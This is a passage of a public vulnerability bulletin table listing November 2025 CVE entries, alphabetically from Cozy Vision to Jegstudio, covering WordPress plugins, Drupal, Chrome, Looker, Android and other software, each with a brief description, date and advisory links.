| Cozy Vision--SMS Alert Order Notifications | Missing Authorization vulnerability in Cozy Vision SMS Alert Order Notifications sms-alert allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SMS Alert Order Notifications: from n/a through <= 3.8.8. | 2025-11-21 | not yet calculated | CVE-2025-66086 | https://vdp.patchstack.com/database/Wordpress/Plugin/sms-alert/vulnerability/wordpress-sms-alert-order-notifications-plugin-3-8-8-broken-access-control-vulnerability?_s_id=cve   |
| Craig Hewitt--Seriously Simple Podcasting | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Craig Hewitt Seriously Simple Podcasting seriously-simple-podcasting allows Retrieve Embedded Sensitive Data.This issue affects Seriously Simple Podcasting: from n/a through <= 3.13.0. | 2025-11-21 | not yet calculated | CVE-2025-66059 | https://vdp.patchstack.com/database/Wordpress/Plugin/seriously-simple-podcasting/vulnerability/wordpress-seriously-simple-podcasting-plugin-3-13-0-sensitive-data-exposure-vulnerability?_s_id=cve   |
| Craig Hewitt--Seriously Simple Podcasting | Missing Authorization vulnerability in Craig Hewitt Seriously Simple Podcasting seriously-simple-podcasting allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Seriously Simple Podcasting: from n/a through <= 3.13.0. | 2025-11-21 | not yet calculated | CVE-2025-66060 | https://vdp.patchstack.com/database/Wordpress/Plugin/seriously-simple-podcasting/vulnerability/wordpress-seriously-simple-podcasting-plugin-3-13-0-broken-access-control-vulnerability-2?_s_id=cve   |
| Craig Hewitt--Seriously Simple Podcasting | Cross-Site Request Forgery (CSRF) vulnerability in Craig Hewitt Seriously Simple Podcasting seriously-simple-podcasting allows Cross Site Request Forgery.This issue affects Seriously Simple Podcasting: from n/a through <= 3.13.0. | 2025-11-21 | not yet calculated | CVE-2025-66061 | https://vdp.patchstack.com/database/Wordpress/Plugin/seriously-simple-podcasting/vulnerability/wordpress-seriously-simple-podcasting-plugin-3-13-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |
| dataease--dataease | Dataease is an open source data visualization analysis tool. Versions prior to 2.10.17 are vulnerable to JNDI injection. A blacklist was added in the patch for version 2.10.14. However, JNDI injection remains possible via the iiop, corbaname, and iiopname schemes. The vulnerability has been fixed in version 2.10.17. | 2025-11-20 | not yet calculated | CVE-2025-64428 | https://github.com/dataease/dataease/security/advisories/GHSA-88ph-3236-2m2h https://github.com/dataease/dataease/commit/b7e585c1cc3fc2b73cb289b8680b4b3914be3d53 https://github.com/dataease/dataease/releases/tag/v2.10.17   |
| Design--Stylish Cost Calculator | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Design Stylish Cost Calculator stylish-cost-calculator allows DOM-Based XSS.This issue affects Stylish Cost Calculator: from n/a through <= 8.1.5. | 2025-11-21 | not yet calculated | CVE-2025-66091 | https://vdp.patchstack.com/database/Wordpress/Plugin/stylish-cost-calculator/vulnerability/wordpress-stylish-cost-calculator-plugin-8-1-5-cross-site-scripting-xss-vulnerability?_s_id=cve   |
| Drupal--Drupal core | Improper Check for Unusual or Exceptional Conditions vulnerability in Drupal Drupal core allows Forceful Browsing.This issue affects Drupal core: from 8.0.0 before 10.4.9, from 10.5.0 before 10.5.6, from 11.0.0 before 11.1.9, from 11.2.0 before 11.2.8. | 2025-11-18 | not yet calculated | CVE-2025-13080 | https://www.drupal.org/sa-core-2025-005   |
| Drupal--Drupal core | Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability in Drupal Drupal core allows Object Injection.This issue affects Drupal core: from 8.0.0 before 10.4.9, from 10.5.0 before 10.5.6, from 11.0.0 before 11.1.9, from 11.2.0 before 11.2.8. | 2025-11-18 | not yet calculated | CVE-2025-13081 | https://www.drupal.org/sa-core-2025-006   |
| Drupal--Drupal core | User Interface (UI) Misrepresentation of Critical Information vulnerability in Drupal Drupal core allows Content Spoofing.This issue affects Drupal core: from 8.0.0 before 10.4.9, from 10.5.0 before 10.5.6, from 11.0.0 before 11.1.9, from 11.2.0 before 11.2.8. | 2025-11-18 | not yet calculated | CVE-2025-13082 | https://www.drupal.org/sa-core-2025-007   |
| Drupal--Drupal core | Use of Web Browser Cache Containing Sensitive Information vulnerability in Drupal Drupal core allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Drupal core: from 8.0.0 before 10.4.9, from 10.5.0 before 10.5.6, from 11.0.0 before 11.1.9, from 11.2.0 before 11.2.8. | 2025-11-18 | not yet calculated | CVE-2025-13083 | https://www.drupal.org/sa-core-2025-008   |
| Drupal--Email TFA | Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal Email TFA allows Functionality Bypass.This issue affects Email TFA: from 0.0.0 before 2.0.6. | 2025-11-18 | not yet calculated | CVE-2025-12760 | https://www.drupal.org/sa-contrib-2025-115   |
| Drupal--Simple multi step form | Improper Neutralization of Input During Web Page Generation ("Cross-site Scripting") vulnerability in Drupal Simple multi step form allows Cross-Site Scripting (XSS).This issue affects Simple multi step form: from 0.0.0 before 2.0.0. | 2025-11-18 | not yet calculated | CVE-2025-12761 | https://www.drupal.org/sa-contrib-2025-116   |
| Eclipse Foundation--Jersey | In Eclipse Jersey versions 2.45, 3.0.16, 3.1.9 a race condition can cause ignoring of critical SSL configurations - such as mutual authentication, custom key/trust stores, and other security settings. This issue may result in SSLHandshakeException under normal circumstances, but under certain conditions, it could lead to unauthorized trust in insecure servers (see PoC) | 2025-11-18 | not yet calculated | CVE-2025-12383 | https://gitlab.eclipse.org/security/cve-assignment/-/issues/74   |
| eGovFramework/egovframe-common-components--eGovFramework/egovframe-common-components | eGovFramework/egovframe-common-components versions up to and including 4.3.1 contain an unauthenticated file upload vulnerability via the /utl/wed/insertImage.do and /utl/wed/insertImageCk.do image upload endpoints. These controllers accept multipart requests without authentication, pass the uploaded content to a shared upload helper, and store the file on the server under a framework-controlled path. The framework then returns a download URL that can be used to retrieve the uploaded content, including an attacker-controlled Content-Type within the limits of the image upload functionality. While a filename extension whitelist is enforced, the attacker fully controls the file contents. The response MIME type used is also attacker-controlled when the file is served up to version < 4.1.2. Since version 4.1.2, it is possible to download any image uploaded with any whitelisted content type. But any file uploaded other than an image will be served with the `application/octet-stream` content type (the content type is no longer controlled by the attacker since version 4.1.2). This enables an unauthenticated attacker to use any affected application as a persistent file hosting service for arbitrary content under the application's origin. KISA/KrCERT has identified this unpatched vulnerability as "KVE-2023-5280." | 2025-11-19 | not yet calculated | CVE-2025-34336 | https://www.egovframe.go.kr/eng/sub.do?menuNo=2 https://github.com/eGovFramework/egovframe-common-components https://pierrekim.github.io/blog/2025-11-20-egovframe-2-vulnerabilities.html https://pierrekim.github.io/advisories/2025-egovframe.txt https://www.vulncheck.com/advisories/egovframework-unauthenticated-file-upload-via-web-editor-image-upload-endpoints   |
| eGovFramework/egovframe-common-components--eGovFramework/egovframe-common-components | eGovFramework/egovframe-common-components versions up to and including 4.3.1 includes Web Editor image upload and related file delivery functionality that uses symmetric encryption to protect URL parameters, but exposes an encryption oracle that allows attackers to generate valid ciphertext for chosen values. The image upload endpoints /utl/wed/insertImage.do and /utl/wed/insertImageCk.do encrypt server-side paths, filenames, and MIME types and embed them directly into a download URL that is returned to the client. Because these same encrypted parameters are trusted by other endpoints, such as /utl/web/imageSrc.do and /cmm/fms/getImage.do, an unauthenticated attacker can abuse the upload functionality to obtain encrypted representations of attacker-chosen identifiers and then replay those ciphertext values to file-serving APIs. This design failure allows an attacker to bypass access controls that rely solely on the secrecy of encrypted parameters and retrieve arbitrary stored files that are otherwise expected to require an existing session or specific authorization context. KISA/KrCERT has identified this unpatched vulnerability as "KVE-2023-5281." | 2025-11-19 | not yet calculated | CVE-2025-34337 | https://www.egovframe.go.kr/eng/sub.do?menuNo=2 https://github.com/eGovFramework/egovframe-common-components https://pierrekim.github.io/blog/2025-11-20-egovframe-2-vulnerabilities.html https://pierrekim.github.io/advisories/2025-egovframe.txt https://www.vulncheck.com/advisories/egovframework-unauthenticated-encryption-oracle-via-web-editor-image-upload-endpoints   |
| EmbySupport--Emby.Security | Emby Server is a personal media server. Prior to version 4.8.1.0 and prior to Beta version 4.9.0.0-beta, a malicious user can send an authentication request with a manipulated X-Emby-Client value, which gets added to the devices section of the admin dashboard without sanitization. This issue has been patched in version 4.8.1.0 and Beta version 4.9.0.0-beta. | 2025-11-18 | not yet calculated | CVE-2025-64325 | https://github.com/EmbySupport/Emby.Security/security/advisories/GHSA-2gwc-988r-2r7x   |
| EnvoThemes--Envo Extra | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in EnvoThemes Envo Extra envo-extra allows Stored XSS.This issue affects Envo Extra: from n/a through <= 1.9.11. | 2025-11-21 | not yet calculated | CVE-2025-66066 | https://vdp.patchstack.com/database/Wordpress/Plugin/envo-extra/vulnerability/wordpress-envo-extra-plugin-1-9-11-cross-site-scripting-xss-vulnerability?_s_id=cve   |
| espressif--esp-idf | ESF-IDF is the Espressif Internet of Things (IOT) Development Framework. When the ESP32 is in advertising mode, if it receives a connection request containing an invalid Access Address (AA) of 0x00000000 or 0xFFFFFFFF, advertising may stop unexpectedly. In this case, the controller may incorrectly report a connection event to the host, which can cause the application layer to assume that the device has successfully established a connection. This issue has been fixed in versions 5.5.2, 5.4.3, 5.3.5, 5.2.6, and 5.1.7. At time of publication versions 5.5.2, 5.3.5, and 5.1.7 have not been released but are fixed respectively in commits 3b95b50, e3d7042, and 75967b5. | 2025-11-17 | not yet calculated | CVE-2025-64342 | https://github.com/espressif/esp-idf/security/advisories/GHSA-8mg7-9qpg-p92v https://github.com/espressif/esp-idf/commit/309f031dd6b04de30c926a256508c65b0df95dfa https://github.com/espressif/esp-idf/commit/3b95b50703cd3301a370cffaa1cc299b1941fe2a https://github.com/espressif/esp-idf/commit/75967b578563ea7876dc215251cbb6d64bc9d768 https://github.com/espressif/esp-idf/commit/8ec541023684d33b498fa21c5b4724bce748aa7b https://github.com/espressif/esp-idf/commit/bf66761962579f73aea682d1154b9c99b9d3d7dc https://github.com/espressif/esp-idf/commit/e3d70429566ece1ef593d36aa4ebd320e0c95925   |
| espressif--esp-idf | ESF-IDF is the Espressif Internet of Things (IOT) Development Framework. In versions 5.5.1, 5.4.3, and 5.3.4, when the ESP32-P4 uses its hardware JPEG decoder, the software parser lacks necessary validation checks. A specially crafted (malicious) JPEG image could exploit the parsing routine and trigger an out-of-bounds array access. This issue has been fixed in versions 5.5.2, 5.4.4, and 5.3.5. At time of publication versions 5.5.2, 5.4.4, and 5.3.5 have not been released but are fixed respectively in commits 4b8f585, c79cb4d, and 34e2726. | 2025-11-21 | not yet calculated | CVE-2025-65092 | https://github.com/espressif/esp-idf/security/advisories/GHSA-vcw6-jc3p-4gj8 https://github.com/espressif/esp-idf/commit/34e2726254201988e6e2752b2db4b70d73964d4c https://github.com/espressif/esp-idf/commit/4b8f5859dbe05d15372558f8a950b49f6ee44e42 https://github.com/espressif/esp-idf/commit/c38a6691b9845ac6ee0d0f6713783114770cdc17 https://github.com/espressif/esp-idf/commit/c79cb4de468854937a0cbf82629fd65d04bffb27   |
| Essential Plugin--Featured Post Creative | Missing Authorization vulnerability in Essential Plugin Featured Post Creative featured-post-creative allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Featured Post Creative: from n/a through <= 1.5.5. | 2025-11-21 | not yet calculated | CVE-2025-66106 | https://vdp.patchstack.com/database/Wordpress/Plugin/featured-post-creative/vulnerability/wordpress-featured-post-creative-plugin-1-5-5-broken-access-control-vulnerability?_s_id=cve   |
| Frank Goossens--WP YouTube Lyte | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Frank Goossens WP YouTube Lyte wp-youtube-lyte allows Phishing.This issue affects WP YouTube Lyte: from n/a through <= 1.7.28. | 2025-11-21 | not yet calculated | CVE-2025-66062 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-youtube-lyte/vulnerability/wordpress-wp-youtube-lyte-plugin-1-7-28-open-redirection-vulnerability?_s_id=cve   |
| FunnelKit--Funnel Builder by FunnelKit | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FunnelKit Funnel Builder by FunnelKit funnel-builder allows DOM-Based XSS.This issue affects Funnel Builder by FunnelKit: from n/a through <= 3.13.1.2. | 2025-11-21 | not yet calculated | CVE-2025-66067 | https://vdp.patchstack.com/database/Wordpress/Plugin/funnel-builder/vulnerability/wordpress-funnel-builder-by-funnelkit-plugin-3-13-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve   |
| getkirby--kirby | Kirby is an open-source content management system. From versions 5.0.0 to 5.1.3, attackers could change the title of any page or the name of any user to a malicious string. Then they could modify any content field of the same model without saving, making the model a candidate for display in the "Changes" dialog. If another authenticated user subsequently opened the dialog in their Panel, the malicious code would be executed. This vulnerability affects all Kirby 5 sites that might have potential attackers in the group of authenticated Panel users or that allow external visitors to update page titles or usernames. The attack requires user interaction by another Panel user and cannot be automated. This issue has been patched in version 5.1.4. | 2025-11-18 | not yet calculated | CVE-2025-65012 | https://github.com/getkirby/kirby/security/advisories/GHSA-84hf-8gh5-575j https://github.com/getkirby/kirby/releases/tag/5.1.4   |
| golang.org/x/crypto--golang.org/x/crypto/ssh | SSH servers parsing GSSAPI authentication requests do not validate the number of mechanisms specified in the request, allowing an attacker to cause unbounded memory consumption. | 2025-11-19 | not yet calculated | CVE-2025-58181 | https://groups.google.com/g/golang-announce/c/w-oX3UxNcZA https://go.dev/cl/721961 https://go.dev/issue/76363 https://pkg.go.dev/vuln/GO-2025-4134   |
| golang.org/x/crypto--golang.org/x/crypto/ssh/agent | SSH Agent servers do not validate the size of messages when processing new identity requests, which may cause the program to panic if the message is malformed due to an out of bounds read. | 2025-11-19 | not yet calculated | CVE-2025-47914 | https://groups.google.com/g/golang-announce/c/w-oX3UxNcZA https://go.dev/cl/721960 https://go.dev/issue/76364 https://pkg.go.dev/vuln/GO-2025-4135   |
| Google Cloud--Looker | An attacker could take over a Looker account in a Looker instance configured with OIDC authentication, due to email address string normalization.Looker-hosted and Self-hosted were found to be vulnerable. This issue has already been mitigated for Looker-hosted. Self-hosted instances must be upgraded as soon as possible. This vulnerability has been patched in all supported versions of Self-hosted. The versions below have all been updated to protect from this vulnerability. You can download these versions at the Looker download page https://download.looker.com/ : * 24.12.100+ * 24.18.193+ * 25.0.69+ * 25.6.57+ * 25.8.39+ * 25.10.22+ * 25.12.0+ | 2025-11-20 | not yet calculated | CVE-2025-12414 | https://cloud.google.com/support/bulletins#GCP-2025-067   |
| Google Cloud--Looker | An attacker with a Looker Developer role could manipulate a LookML project to exploit a race condition during Git directory deletion, leading to arbitrary command execution on the Looker instance. Looker-hosted and Self-hosted were found to be vulnerable. This issue has already been mitigated for Looker-hosted instances. No user action is required for these. Self-hosted instances must be upgraded as soon as possible. This vulnerability has been patched in all supported versions of Self-hosted. The versions below have all been updated to protect from this vulnerability. You can download these versions at the Looker download page https://download.looker.com/ : * 24.12.103+ * 24.18.195+ * 25.0.72+ * 25.6.60+ * 25.8.42+ * 25.10.22+ | 2025-11-19 | not yet calculated | CVE-2025-12472 | https://cloud.google.com/support/bulletins#gcp-2025-052   |
| Google Cloud--Looker | The Looker endpoint for generating new projects from database connections allows users to specify "looker" as a connection name, which is a reserved internal name for Looker's internal MySQL database. The schemas parameter is vulnerable to SQL injection, enabling attackers to manipulate SELECT queries that are constructed and executed against the internal MySQL database. This vulnerability allows users with developer permissions to extract data from Looker's internal MySQL database. Looker-hosted and Self-hosted were found to be vulnerable. This issue has already been mitigated for Looker-hosted instances. No user action is required for these. Self-hosted instances must be upgraded as soon as possible. This vulnerability has been patched in all supported versions of Self-hosted. The versions below have all been updated to protect against this vulnerability. You can download these versions at the Looker download page https://download.looker.com/ : * 24.12.106 * 24.18.198+ * 25.0.75 * 25.6.63+ * 25.8.45+ * 25.10.33+ * 25.12.1+ * 25.14+ | 2025-11-19 | not yet calculated | CVE-2025-12743 | https://cloud.google.com/support/bulletins#gcp-2025-052 https://www.tenable.com/security/research/tra-2025-43   |
| Google--Android | In bta_hf_client_cb_init of bta_hf_client_main.cc, there is a possible remote code execution due to a use after free. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-11-18 | not yet calculated | CVE-2025-48593 | https://android.googlesource.com/platform/packages/modules/Bluetooth/+/c69c78d7c4f623201f35831d32e6c401156e76cc https://android.googlesource.com/platform/packages/modules/Bluetooth/+/5ed63461b44198c80d5aff7e1af1df812f782abb https://source.android.com/security/bulletin/2025-11-01   |
| Google--Chrome | Type Confusion in V8 in Google Chrome prior to 142.0.7444.175 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2025-11-17 | not yet calculated | CVE-2025-13223 |   |
| Google--Chrome | Type Confusion in V8 in Google Chrome prior to 142.0.7444.175 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2025-11-17 | not yet calculated | CVE-2025-13224 |   |
| Google--Chrome | Type Confusion in V8 in Google Chrome prior to 142.0.7444.59 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2025-11-17 | not yet calculated | CVE-2025-13226 |   |
| Google--Chrome | Type Confusion in V8 in Google Chrome prior to 142.0.7444.59 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2025-11-17 | not yet calculated | CVE-2025-13227 |   |
| Google--Chrome | Type Confusion in V8 in Google Chrome prior to 142.0.7444.59 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2025-11-17 | not yet calculated | CVE-2025-13228 |   |
| Google--Chrome | Type Confusion in V8 in Google Chrome prior to 142.0.7444.59 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2025-11-17 | not yet calculated | CVE-2025-13229 |   |
| Google--Chrome | Type Confusion in V8 in Google Chrome prior to 142.0.7444.59 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2025-11-17 | not yet calculated | CVE-2025-13230 |   |
| Google--OSV-SCALIBR | A bug in the filesystem traversal fallback path causes fs/diriterate/diriterate.go:Next() to overindex an empty slice when ReadDir returns nil for an empty directory, resulting in a panic (index out of range) and an application crash (denial of service) in OSV-SCALIBR. | 2025-11-20 | not yet calculated | CVE-2025-13425 | https://github.com/google/osv-scalibr/commit/e67c4e198ca099cb7c16957a80f6c5331d90a672   |
| Google--zx | When zx is invoked with --prefer-local=<path>, the CLI creates a symlink named ./node_modules pointing to <path>/node_modules. Due to a logic error in src/cli.ts (linkNodeModules / cleanup), the function returns the target path instead of the alias (symlink path). The later cleanup routine removes what it received, which deletes the target directory itself. Result: zx can delete an external <path>/node_modules outside the current working directory. | 2025-11-20 | not yet calculated | CVE-2025-13437 | https://github.com/google/zx/issues/1348   |
| hupe13--Extensions for Leaflet Map | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in hupe13 Extensions for Leaflet Map extensions-leaflet-map allows DOM-Based XSS.This issue affects Extensions for Leaflet Map: from n/a through <= 4.8. | 2025-11-21 | not yet calculated | CVE-2025-66093 | https://vdp.patchstack.com/database/Wordpress/Plugin/extensions-leaflet-map/vulnerability/wordpress-extensions-for-leaflet-map-plugin-4-8-cross-site-scripting-xss-vulnerability?_s_id=cve   |
| Icegram--Email Subscribers & Newsletters | Deserialization of Untrusted Data vulnerability in Icegram Email Subscribers & Newsletters email-subscribers allows Object Injection.This issue affects Email Subscribers & Newsletters: from n/a through <= 5.9.10. | 2025-11-21 | not yet calculated | CVE-2025-66055 | https://vdp.patchstack.com/database/Wordpress/Plugin/email-subscribers/vulnerability/wordpress-email-subscribers-newsletters-plugin-5-9-10-php-object-injection-vulnerability?_s_id=cve   |
| Igor Jerosimi--I Order Terms | Cross-Site Request Forgery (CSRF) vulnerability in Igor Jerosimić I Order Terms i-order-terms allows Cross Site Request Forgery.This issue affects I Order Terms: from n/a through <= 1.5.0. | 2025-11-21 | not yet calculated | CVE-2025-66097 | https://vdp.patchstack.com/database/Wordpress/Plugin/i-order-terms/vulnerability/wordpress-i-order-terms-plugin-1-5-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |
| ilbers--isar | Isar is an integration system for automated root filesystem generation. In versions 0.11-rc1 and 0.11, defining ISAR_APT_SNAPSHOT_DATE alone does not set the correct timestamp value for security distribution, leading to missed security updates. This issue has been patched via commit 738bcbb. | 2025-11-19 | not yet calculated | CVE-2025-65100 | https://github.com/ilbers/isar/security/advisories/GHSA-3r9w-6cp6-7hm4 https://github.com/ilbers/isar/commit/3383fd808a4ced93e41e012660dfe364a3384434 https://github.com/ilbers/isar/commit/738bcbb716c7eb7b34cbb2293cae4f264b3925fe   |
| Imagination Technologies--Graphics DDK | Kernel or driver software installed on a Guest VM may post improper commands to the GPU Firmware to exploit a TOCTOU race condition and trigger a read and/or write of data outside the allotted memory escaping the virtual machine. | 2025-11-17 | not yet calculated | CVE-2025-58407 | https://www.imaginationtech.com/gpu-driver-vulnerabilities/   |
| Imagination Technologies--Graphics DDK | Software installed and run as a non-privileged user may conduct improper GPU system calls to gain write permissions to memory buffers exported as read-only. This is caused by improper handling of the memory protections for the buffer resource. | 2025-11-17 | not yet calculated | CVE-2025-58410 | https://www.imaginationtech.com/gpu-driver-vulnerabilities/   |
| Imtiaz Rayhan--Table Block by Tableberg | Missing Authorization vulnerability in Imtiaz Rayhan Table Block by Tableberg tableberg allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Table Block by Tableberg: from n/a through <= 0.6.9. | 2025-11-21 | not yet calculated | CVE-2025-66096 | https://vdp.patchstack.com/database/Wordpress/Plugin/tableberg/vulnerability/wordpress-table-block-by-tableberg-plugin-0-6-9-broken-access-control-vulnerability?_s_id=cve   |
| Informtica del Este--WinPlus | Faulty authorization control in software WinPlus v24.11.27 by Informática del Este that allows another user to be impersonated simply by knowing their 'numerical ID', meaning that an attacker could compromise another user's account, thereby affecting the confidentiality, integrity, and availability of the data stored in the application. | 2025-11-18 | not yet calculated | CVE-2025-41346 | https://www.incibe.es/en/incibe-cert/notices/aviso/stored-cross-site-scripting-xss-winplus-informatica-del-este   |
| Informtica del Este--WinPlus | Unlimited upload vulnerability for dangerous file types in WinPlus v24.11.27 from Informática del Este. This vulnerability allows an attacker to upload a 'webshell' by sending a POST request to '/WinplusPortal/ws/sWinplus.svc/json/uploadfile'. | 2025-11-18 | not yet calculated | CVE-2025-41347 | https://www.incibe.es/en/incibe-cert/notices/aviso/stored-cross-site-scripting-xss-winplus-informatica-del-este   |
| Informtica del Este--WinPlus | SQL injection vulnerability in WinPlus v24.11.27 by Informática del Este. This vulnerability allows an attacker recover, create, update an delete databases by sendng a POST request using the parameters 'val1' and 'cont in '/WinplusPortal/ws/sWinplus.svc/json/getacumper_post'. | 2025-11-18 | not yet calculated | CVE-2025-41348 | https://www.incibe.es/en/incibe-cert/notices/aviso/stored-cross-site-scripting-xss-winplus-informatica-del-este   |
| Informtica del Este--WinPlus | Stored Cross-site Scripting (XSS)vylnerability type in WinPlus v24.11.27 byInformática del Este that consist of an stored XSS of a stored XSS due to a lack of proper validation of user input by sending a POST request using the 'descripcion' parameter in '/WinplusPortal/ws/sWinplus. svc/json/savesolpla_post'. This vulnerability could allow a remote user to send a specially crafted query to an authenticated user and steal their cookie session details. | 2025-11-18 | not yet calculated | CVE-2025-41349 | https://www.incibe.es/en/incibe-cert/notices/aviso/stored-cross-site-scripting-xss-winplus-informatica-del-este   |
| Informtica del Este--WinPlus | Stored Cross-site Scripting (XSS)vylnerability type in WinPlus v24.11.27 byInformática del Este that consist of an stored XSS of a stored XSS due to a lack of proper validation of user input by sending a POST request using the 'descripcion' parameter in '/WinplusPortal/ws/sWinplus.svc/json/savesoldoc_post'. This vulnerability could allow a remote user to send a specially crafted query to an authenticated user and steal their cookie session details. | 2025-11-18 | not yet calculated | CVE-2025-41350 | https://www.incibe.es/en/incibe-cert/notices/aviso/stored-cross-site-scripting-xss-winplus-informatica-del-este   |
| Iqonic Design--KiviCare | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Iqonic Design KiviCare kivicare-clinic-management-system allows SQL Injection.This issue affects KiviCare: from n/a through <= 3.6.13. | 2025-11-21 | not yet calculated | CVE-2025-66095 | https://vdp.patchstack.com/database/Wordpress/Plugin/kivicare-clinic-management-system/vulnerability/wordpress-kivicare-plugin-3-6-13-sql-injection-vulnerability?_s_id=cve   |
| JCD--Windu CMS | Windu CMS is vulnerable to Cross-Site Request Forgery in user editing functionality. Implemented CSRF protection mechanism can be bypassed by using CSRF token of other user. It is worth noting that the registration is open and anyone can create an account. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 4.1 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2025-11-18 | not yet calculated | CVE-2025-59110 | https://windu.org/ https://cert.pl/posts/2025/11/CVE-2025-59110   |
| JCD--Windu CMS | Windu CMS is vulnerable to Broken Access Control in user editing functionality. Malicious attacker can send a GET request which allows privileged users to delete Super Admins which is not possible with GUI. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 4.1 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2025-11-18 | not yet calculated | CVE-2025-59111 | https://windu.org https://cert.pl/posts/2025/11/CVE-2025-59110   |
| JCD--Windu CMS | Windu CMS is vulnerable to Cross-Site Request Forgery in user editing functionality. Malicious attacker can craft special website, which when visited by the victim, will automatically send POST request that deletes given user. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 4.1 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2025-11-18 | not yet calculated | CVE-2025-59112 | https://windu.org https://cert.pl/posts/2025/11/CVE-2025-59110   |
| JCD--Windu CMS | Windu CMS implements weak client-side brute-force protection by using parameter loginError. Information about attempt count or timeout is not stored on the server, which allows a malicious attacker to bypass this brute-force protection by resetting this parameter. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 4.1 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2025-11-18 | not yet calculated | CVE-2025-59113 | https://windu.org https://cert.pl/posts/2025/11/CVE-2025-59110   |
| JCD--Windu CMS | Windu CMS is vulnerable to Cross-Site Request Forgery in file uploading functionality. Malicious attacker can craft special website, which when visited by the victim, will automatically send malicious file to the server. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 4.1 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2025-11-18 | not yet calculated | CVE-2025-59114 | https://windu.org https://cert.pl/posts/2025/11/CVE-2025-59110   |
| JCD--Windu CMS | Windu CMS is vulnerable to Stored Cross-Site Scripting (XSS) in the logon page where input data has no proper validation. Malicious attacker can inject arbitrary HTML and JS into website, which will be rendered/executed when visiting logs page by admin. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 4.1 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2025-11-18 | not yet calculated | CVE-2025-59115 | https://windu.org https://cert.pl/posts/2025/11/CVE-2025-59110   |
| JCD--Windu CMS | Windu CMS is vulnerable to User Enumeration. This issue occurs during logon, where a difference in messages could allow an attacker to determine if the login is valid or not, enabling a brute force attack with valid logins. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 4.1 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2025-11-18 | not yet calculated | CVE-2025-59116 | https://windu.org https://cert.pl/posts/2025/11/CVE-2025-59110   |
| JCD--Windu CMS | Windu CMS is vulnerable to multiple Stored Cross-Site Scripting (XSS) vulnerabilities in the page editing endpoint windu/admin/content/pages/edit/. This vulnerability can be exploited by a privileged user and may target users with higher privileges. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 4.1 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2025-11-18 | not yet calculated | CVE-2025-59117 | https://windu.org https://cert.pl/posts/2025/11/CVE-2025-59110   |
| Jeff Starr--Head Meta Data | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jeff Starr Head Meta Data head-meta-data allows Stored XSS.This issue affects Head Meta Data: from n/a through <= 20250327. | 2025-11-21 | not yet calculated | CVE-2025-66081 | https://vdp.patchstack.com/database/Wordpress/Plugin/head-meta-data/vulnerability/wordpress-head-meta-data-plugin-20250327-cross-site-scripting-xss-vulnerability?_s_id=cve   |
| Jegstudio--Gutenverse | Missing Authorization vulnerability in Jegstudio Gutenverse gutenverse allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Gutenverse: from n/a through <= 3.2.1. | 2025-11-21 | not yet calculated | CVE-2025-66065 | https://vdp.patchstack.com/database/Wordpress/Plugin/gutenverse/vulnerability/wordpress-gutenverse-plugin-3-2-1-broken-access-control-vulnerability?_s_id=cve   |
| Jegstudio--Gutenverse Form | Missing Authorization vulnerability in Jegstudio Gutenverse Form gutenverse-form allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Gutenverse Form: from n/a through <= 2.2.0. | 2025-11-21 | not yet calculated | CVE-2025-66079 | https://vdp.patchstack.com/database/Wordpress/Plugin/gutenverse-form/vulnerability/wordpress-gutenverse-form-plugin-2-2-0-broken-access-control-vulnerability?_s_id=cve   |
